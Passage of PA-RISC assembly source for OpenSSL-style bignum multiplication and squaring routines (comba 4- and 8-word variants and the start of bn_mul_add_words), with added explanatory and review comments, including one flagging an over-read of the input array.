	ADD	C1,lt,C1		; c1=c1+lt
	ADD,DC	ht,%r0,ht		; ht++
	ADD	C2,ht,C2		; c2=c2+ht
	ADD,DC	C3,%r0,C3		; c3++
	.endm
; SQR_ADD_C2: (C3:C2:C1) += 2 * a * b for the off-diagonal terms of a
; square, where a = A0L:A0R and b = A1L:A1R.  The 128-bit product is
; built from four XMPYU partials, then the whole ht:lt pair is doubled
; with explicit carry propagation into C3.  Clobbers ftemp1-4, m, m1,
; lt, ht, temp1, temp3 and -8..-32(%sp).
SQR_ADD_C2 .macro A0L,A0R,A1L,A1R,C1,C2,C3
	XMPYU	A0L,A1R,ftemp1		; m1 = bl*ht
	FSTD	ftemp1,-16(%sp)		;
	XMPYU	A0R,A1L,ftemp2		; m = bh*lt
	FSTD	ftemp2,-8(%sp)		;
	XMPYU	A0R,A1R,ftemp3		; lt = bl*lt
	FSTD	ftemp3,-32(%sp)
	XMPYU	A0L,A1L,ftemp4		; ht = bh*ht
	FSTD	ftemp4,-24(%sp)		;
	LDD	-8(%sp),m		; r21 = m
	LDD	-16(%sp),m1		; r19 = m1
	ADD,L	m,m1,m			; m+m1
	DEPD,Z	m,31,32,temp3		; (m+m1)<<32
	LDD	-24(%sp),ht		; r24 = ht
	CMPCLR,*>>=	m,m1,%r0	; if (m < m1)
	ADD,L	ht,high_one,ht		; ht+=high_one
	EXTRD,U	m,31,32,temp1		; m >> 32
	LDD	-32(%sp),lt		; lt
	ADD,L	ht,temp1,ht		; ht+= m>>32
	ADD	lt,temp3,lt		; lt = lt+m1
	ADD,DC	ht,%r0,ht		; ht++
	ADD	ht,ht,ht		; ht=ht+ht; (double the product)
	ADD,DC	C3,%r0,C3		; add in carry (c3++)
	ADD	lt,lt,lt		; lt=lt+lt;
	ADD,DC	ht,%r0,ht		; add in carry (ht++)
	ADD	C1,lt,C1		; c1=c1+lt
	ADD,DC,*NUV	ht,%r0,ht	; add in carry (ht++)
	LDO	1(C3),C3		; bump c3 if overflow,nullify otherwise
	ADD	C2,ht,C2		; c2 = c2 + ht
	ADD,DC	C3,%r0,C3		; add in carry (c3++)
	.endm
;
;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
;
; Fully unrolled 8-word comba square: r[0..15] = a[0..7]^2.
; Each output column k sums all a[i]*a[j] with i+j == k into the rolling
; accumulators c1/c2/c3 (SQR_ADD_C for the diagonal i==j, SQR_ADD_C2 for
; each doubled off-diagonal pair), then stores and rotates.
;
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba8
	.PROC
	.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
	.EXPORT	bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.ENTRY
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	STD	%r5,16(%sp)		; save r5
	STD	%r6,24(%sp)		; save r6
	;
	; Zero out carries
	;
	COPY	%r0,c1
	COPY	%r0,c2
	COPY	%r0,c3
	LDO	128(%sp),%sp		; bump stack
	DEPDI,Z	-1,32,33,high_mask	; Create Mask 0xffffffff80000000L
	DEPDI,Z	1,31,1,high_one		; Create Value  1 << 32
	;
	; Load up all of the values we are going to use
	;
	FLDD	0(a_ptr),a0
	FLDD	8(a_ptr),a1
	FLDD	16(a_ptr),a2
	FLDD	24(a_ptr),a3
	FLDD	32(a_ptr),a4
	FLDD	40(a_ptr),a5
	FLDD	48(a_ptr),a6
	FLDD	56(a_ptr),a7
	SQR_ADD_C a0L,a0R,c1,c2,c3
	STD	c1,0(r_ptr)		; r[0] = c1;
	COPY	%r0,c1
	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
	STD	c2,8(r_ptr)		; r[1] = c2;
	COPY	%r0,c2
	SQR_ADD_C a1L,a1R,c3,c1,c2
	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
	STD	c3,16(r_ptr)		; r[2] = c3;
	COPY	%r0,c3
	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
	STD	c1,24(r_ptr)		; r[3] = c1;
	COPY	%r0,c1
	SQR_ADD_C a2L,a2R,c2,c3,c1
	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
	SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
	STD	c2,32(r_ptr)		; r[4] = c2;
	COPY	%r0,c2
	SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
	SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
	STD	c3,40(r_ptr)		; r[5] = c3;
	COPY	%r0,c3
	SQR_ADD_C a3L,a3R,c1,c2,c3
	SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
	SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
	SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
	STD	c1,48(r_ptr)		; r[6] = c1;
	COPY	%r0,c1
	SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
	SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
	SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
	SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
	STD	c2,56(r_ptr)		; r[7] = c2;
	COPY	%r0,c2
	SQR_ADD_C a4L,a4R,c3,c1,c2
	SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
	SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
	SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
	STD	c3,64(r_ptr)		; r[8] = c3;
	COPY	%r0,c3
	SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
	SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
	SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
	STD	c1,72(r_ptr)		; r[9] = c1;
	COPY	%r0,c1
	SQR_ADD_C a5L,a5R,c2,c3,c1
	SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
	SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
	STD	c2,80(r_ptr)		; r[10] = c2;
	COPY	%r0,c2
	SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
	SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
	STD	c3,88(r_ptr)		; r[11] = c3;
	COPY	%r0,c3
	SQR_ADD_C a6L,a6R,c1,c2,c3
	SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
	STD	c1,96(r_ptr)		; r[12] = c1;
	COPY	%r0,c1
	SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
	STD	c2,104(r_ptr)		; r[13] = c2;
	COPY	%r0,c2
	SQR_ADD_C a7L,a7R,c3,c1,c2
	STD	c3, 112(r_ptr)		; r[14] = c3
	STD	c1, 120(r_ptr)		; r[15] = c1
	.EXIT
	LDD	-104(%sp),%r6		; restore r6
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
;
; Fully unrolled 4-word comba square: r[0..7] = a[0..3]^2.
; Same column scheme as bn_sqr_comba8.
;
; NOTE(review): this routine FLDDs a4..a7 (offsets 32..56) even though
; only a0..a3 are ever used -- it reads 64 bytes from a 4-word input
; array.  This matches the upstream code, but relies on the 32 bytes
; past the array being readable; confirm callers guarantee that.
;
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba4
	.proc
	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
	.EXPORT	bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.entry
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	STD	%r5,16(%sp)		; save r5
	STD	%r6,24(%sp)		; save r6
	;
	; Zero out carries
	;
	COPY	%r0,c1
	COPY	%r0,c2
	COPY	%r0,c3
	LDO	128(%sp),%sp		; bump stack
	DEPDI,Z	-1,32,33,high_mask	; Create Mask 0xffffffff80000000L
	DEPDI,Z	1,31,1,high_one		; Create Value  1 << 32
	;
	; Load up all of the values we are going to use
	;
	FLDD	0(a_ptr),a0
	FLDD	8(a_ptr),a1
	FLDD	16(a_ptr),a2
	FLDD	24(a_ptr),a3
	FLDD	32(a_ptr),a4		; unused -- see NOTE above
	FLDD	40(a_ptr),a5		; unused
	FLDD	48(a_ptr),a6		; unused
	FLDD	56(a_ptr),a7		; unused
	SQR_ADD_C a0L,a0R,c1,c2,c3
	STD	c1,0(r_ptr)		; r[0] = c1;
	COPY	%r0,c1
	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
	STD	c2,8(r_ptr)		; r[1] = c2;
	COPY	%r0,c2
	SQR_ADD_C a1L,a1R,c3,c1,c2
	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
	STD	c3,16(r_ptr)		; r[2] = c3;
	COPY	%r0,c3
	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
	STD	c1,24(r_ptr)		; r[3] = c1;
	COPY	%r0,c1
	SQR_ADD_C a2L,a2R,c2,c3,c1
	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
	STD	c2,32(r_ptr)		; r[4] = c2;
	COPY	%r0,c2
	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
	STD	c3,40(r_ptr)		; r[5] = c3;
	COPY	%r0,c3
	SQR_ADD_C a3L,a3R,c1,c2,c3
	STD	c1,48(r_ptr)		; r[6] = c1;
	STD	c2,56(r_ptr)		; r[7] = c2;
	.EXIT
	LDD	-104(%sp),%r6		; restore r6
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND
;---------------------------------------------------------------------------
; MUL_ADD_C: (C3:C2:C1) += a * b where a = A0L:A0R and b = B0L:B0R.
; Single (undoubled) 64x64->128 product from four XMPYU partials,
; accumulated into the comba column registers.  Clobbers ftemp1-4, m,
; m1, lt, ht, temp1, temp3 and -8..-32(%sp).
MUL_ADD_C .macro A0L,A0R,B0L,B0R,C1,C2,C3
	XMPYU	A0L,B0R,ftemp1		; m1 = bl*ht
	FSTD	ftemp1,-16(%sp)		;
	XMPYU	A0R,B0L,ftemp2		; m = bh*lt
	FSTD	ftemp2,-8(%sp)		;
	XMPYU	A0R,B0R,ftemp3		; lt = bl*lt
	FSTD	ftemp3,-32(%sp)
	XMPYU	A0L,B0L,ftemp4		; ht = bh*ht
	FSTD	ftemp4,-24(%sp)		;
	LDD	-8(%sp),m		; r21 = m
	LDD	-16(%sp),m1		; r19 = m1
	ADD,L	m,m1,m			; m+m1
	DEPD,Z	m,31,32,temp3		; (m+m1)<<32
	LDD	-24(%sp),ht		; r24 = ht
	CMPCLR,*>>=	m,m1,%r0	; if (m < m1)
	ADD,L	ht,high_one,ht		; ht+=high_one
	EXTRD,U	m,31,32,temp1		; m >> 32
	LDD	-32(%sp),lt		; lt
	ADD,L	ht,temp1,ht		; ht+= m>>32
	ADD	lt,temp3,lt		; lt = lt+m1
	ADD,DC	ht,%r0,ht		; ht++
	ADD	C1,lt,C1		; c1=c1+lt
	ADD,DC	ht,%r0,ht		; ht++
	ADD	C2,ht,C2		; c2 = c2 + ht
	ADD,DC	C3,%r0,C3		; add in carry (c3++)
	.endm
;
;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
;
; Fully unrolled 8x8-word comba multiply: r[0..15] = a[0..7] * b[0..7].
; Output column k accumulates every a[i]*b[j] with i+j == k via
; MUL_ADD_C into the rolling c1/c2/c3 accumulators.
; fr12/fr13 (b6/b7) are callee-save, hence the FSTD/FLDD pairs.
;
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba8
	.proc
	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
	.EXPORT	bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.entry
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	STD	%r5,16(%sp)		; save r5
	STD	%r6,24(%sp)		; save r6
	FSTD	%fr12,32(%sp)		; save fr12 (callee-save, holds b6)
	FSTD	%fr13,40(%sp)		; save fr13 (callee-save, holds b7)
	;
	; Zero out carries
	;
	COPY	%r0,c1
	COPY	%r0,c2
	COPY	%r0,c3
	LDO	128(%sp),%sp		; bump stack
	DEPDI,Z	1,31,1,high_one		; Create Value  1 << 32
	;
	; Load up all of the values we are going to use
	;
	FLDD	0(a_ptr),a0
	FLDD	8(a_ptr),a1
	FLDD	16(a_ptr),a2
	FLDD	24(a_ptr),a3
	FLDD	32(a_ptr),a4
	FLDD	40(a_ptr),a5
	FLDD	48(a_ptr),a6
	FLDD	56(a_ptr),a7
	FLDD	0(b_ptr),b0
	FLDD	8(b_ptr),b1
	FLDD	16(b_ptr),b2
	FLDD	24(b_ptr),b3
	FLDD	32(b_ptr),b4
	FLDD	40(b_ptr),b5
	FLDD	48(b_ptr),b6
	FLDD	56(b_ptr),b7
	MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
	STD	c1,0(r_ptr)		; r[0]
	COPY	%r0,c1
	MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
	MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
	STD	c2,8(r_ptr)		; r[1]
	COPY	%r0,c2
	MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
	MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
	MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
	STD	c3,16(r_ptr)		; r[2]
	COPY	%r0,c3
	MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
	MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
	MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
	MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
	STD	c1,24(r_ptr)		; r[3]
	COPY	%r0,c1
	MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
	MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
	MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
	MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
	MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
	STD	c2,32(r_ptr)		; r[4]
	COPY	%r0,c2
	MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
	MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
	MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
	MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
	MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
	MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
	STD	c3,40(r_ptr)		; r[5]
	COPY	%r0,c3
	MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
	MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
	MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
	MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
	MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
	MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
	MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
	STD	c1,48(r_ptr)		; r[6]
	COPY	%r0,c1
	MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
	MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
	MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
	MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
	MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
	MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
	MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
	MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
	STD	c2,56(r_ptr)		; r[7]
	COPY	%r0,c2
	MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
	MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
	MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
	MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
	MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
	MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
	MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
	STD	c3,64(r_ptr)		; r[8]
	COPY	%r0,c3
	MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
	MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
	MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
	MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
	MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
	MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
	STD	c1,72(r_ptr)		; r[9]
	COPY	%r0,c1
	MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
	MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
	MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
	MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
	MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
	STD	c2,80(r_ptr)		; r[10]
	COPY	%r0,c2
	MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
	MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
	MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
	MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
	STD	c3,88(r_ptr)		; r[11]
	COPY	%r0,c3
	MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
	MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
	MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
	STD	c1,96(r_ptr)		; r[12]
	COPY	%r0,c1
	MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
	MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
	STD	c2,104(r_ptr)		; r[13]
	COPY	%r0,c2
	MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
	STD	c3,112(r_ptr)		; r[14]
	STD	c1,120(r_ptr)		; r[15]
	.EXIT
	FLDD	-88(%sp),%fr13		; restore fr13
	FLDD	-96(%sp),%fr12		; restore fr12
	LDD	-104(%sp),%r6		; restore r6
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
;
; r[0..7] = a[0..3] * b[0..3]  (4x4 comba-style multiply).
; c1/c2/c3 form a 3-word rotating column accumulator: after each result
; word is stored, the just-stored register is zeroed and the roles rotate.
; fr12/fr13 are callee-save FP registers (see register notes above) and
; must be preserved across the body.
;
bn_mul_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save fr12 (callee-save FP reg)
FSTD %fr13,40(%sp) ; save fr13 (callee-save FP reg)
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1
COPY %r0,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2
COPY %r0,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3
COPY %r0,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1
STD c2,56(r_ptr) ; r[7] = c2 (top word; no carry can remain in c3 here)
.EXIT
FLDD -88(%sp),%fr13 ; restore fr13 (offsets relative to bumped sp)
FLDD -96(%sp),%fr12 ; restore fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3 and pop frame (in BVE delay slot)
.PROCEND
.SPACE $TEXT$
.SUBSPA $CODE$
.SPACE $PRIVATE$,SORT=16
.IMPORT $global$,DATA
.SPACE $TEXT$
.SUBSPA $CODE$
.SUBSPA $LIT$,ACCESS=0x2c
C$4
.ALIGN 8
.STRINGZ "Division would overflow (%d)\n"
.END
; --- dataset-extraction artifact (repository metadata, not source code) ---
; AIFM-sys/AIFM | 48,599 | shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/pa-risc2.s
; (the lines below this point are the start of pa-risc2.s, a separate file
; concatenated here; commented out so an assembler does not choke on the bars)
;
; PA-RISC 2.0 implementation of bn_asm code, based on the
; 64-bit version of the code. This code is effectively the
; same as the 64-bit version except the register model is
; slightly different given all values must be 32-bit between
; function calls. Thus the 64-bit return values are returned
; in %ret0 and %ret1 vs just %ret0 as is done in 64-bit
;
;
; This code is approximately 2x faster than the C version
; for RSA/DSA.
;
; See http://devresource.hp.com/ for more details on the PA-RISC
; architecture. Also see the book "PA-RISC 2.0 Architecture"
; by Gerry Kane for information on the instruction set architecture.
;
; Code written by Chris Ruemmler (with some help from the HP C
; compiler).
;
; The code compiles with HP's assembler
;
.level 2.0N
.space $TEXT$
.subspa $CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
;
; Global Register definitions used for the routines.
;
; Some information about HP's runtime architecture for 32-bits.
;
; "Caller save" means the calling function must save the register
; if it wants the register to be preserved.
; "Callee save" means if a function uses the register, it must save
; the value before using it.
;
; For the floating point registers
;
; "caller save" registers: fr4-fr11, fr22-fr31
; "callee save" registers: fr12-fr21
; "special" registers: fr0-fr3 (status and exception registers)
;
; For the integer registers
; value zero : r0
; "caller save" registers: r1,r19-r26
; "callee save" registers: r3-r18
; return register : r2 (rp)
; return values ; r28,r29 (ret0,ret1)
; Stack pointer ; r30 (sp)
; millicode return ptr ; r31 (also a caller save register)
;
; Arguments to the routines
;
r_ptr .reg %r26
a_ptr .reg %r25
b_ptr .reg %r24
num .reg %r24
n .reg %r23
;
; Note that the "w" argument for bn_mul_add_words and bn_mul_words
; is passed on the stack at a delta of -56 from the top of stack
; as the routine is entered.
;
;
; Globals used in some routines
;
top_overflow .reg %r23
high_mask .reg %r22 ; value 0xffffffff80000000L
;------------------------------------------------------------------------------
;
; bn_mul_add_words
;
;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr,
; int num, BN_ULONG w)
;
; arg0 = r_ptr
; arg1 = a_ptr
; arg3 = num
; -56(sp) = w
;
; Local register definitions
;
fm1 .reg %fr22
fm .reg %fr23
ht_temp .reg %fr24
ht_temp_1 .reg %fr25
lt_temp .reg %fr26
lt_temp_1 .reg %fr27
fm1_1 .reg %fr28
fm_1 .reg %fr29
fw_h .reg %fr7L
fw_l .reg %fr7R
fw .reg %fr7
fht_0 .reg %fr8L
flt_0 .reg %fr8R
t_float_0 .reg %fr8
fht_1 .reg %fr9L
flt_1 .reg %fr9R
t_float_1 .reg %fr9
tmp_0 .reg %r31
tmp_1 .reg %r21
m_0 .reg %r20
m_1 .reg %r19
ht_0 .reg %r1
ht_1 .reg %r3
lt_0 .reg %r4
lt_1 .reg %r5
m1_0 .reg %r6
m1_1 .reg %r7
rp_val .reg %r8
rp_val_1 .reg %r9
;
; BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr, int num, BN_ULONG w)
; r[i] += a[i] * w for i in [0, num); returns the final carry in ret0/ret1
; (64-bit result split across the two 32-bit return registers).
; The main loop is unrolled x2; 32x32 multiplies are done with XMPYU in the
; FP unit and round-tripped through the stack to the integer registers.
; NOTE(review): instruction order is significant (delay slots, ADD,DC carry
; chains) — code left byte-identical, comments only.
;
bn_mul_add_words
.export bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
.proc
.callinfo frame=128
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP ; Needed to make the loop 16-byte aligned
NOP ; needed to make the loop 16-byte aligned
STD %r5,16(%sp) ; save r5
NOP
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
STD %r8,40(%sp) ; save r8
STD %r9,48(%sp) ; save r9
COPY %r0,%ret1 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
CMPIB,>= 0,num,bn_mul_add_words_exit ; if (num <= 0) then exit
LDO 128(%sp),%sp ; bump stack
;
; The loop is unrolled twice, so if there is only 1 number
; then go straight to the cleanup code.
;
CMPIB,= 1,num,bn_mul_add_words_single_top
FLDD -184(%sp),fw ; (-56-128) load up w into fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_add_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDD 8(r_ptr),rp_val_1 ; rp[1]
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = fht_1*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1[0]
FSTD fm1_1,-48(%sp) ; -48(sp) = m1[1]
XMPYU flt_0,fw_h,fm ; m[0] = flt_0*fw_h
XMPYU flt_1,fw_h,fm_1 ; m[1] = flt_1*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m[0]
FSTD fm_1,-40(%sp) ; -40(sp) = m[1]
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp_1 = fht_1*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht_temp
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht_temp_1
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt_temp
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt_temp_1
LDD -8(%sp),m_0 ; m[0]
LDD -40(%sp),m_1 ; m[1]
LDD -16(%sp),m1_0 ; m1[0]
LDD -48(%sp),m1_1 ; m1[1]
LDD -24(%sp),ht_0 ; ht[0]
LDD -56(%sp),ht_1 ; ht[1]
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m[0] + m1[0];
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m[1] + m1[1];
LDD -32(%sp),lt_0
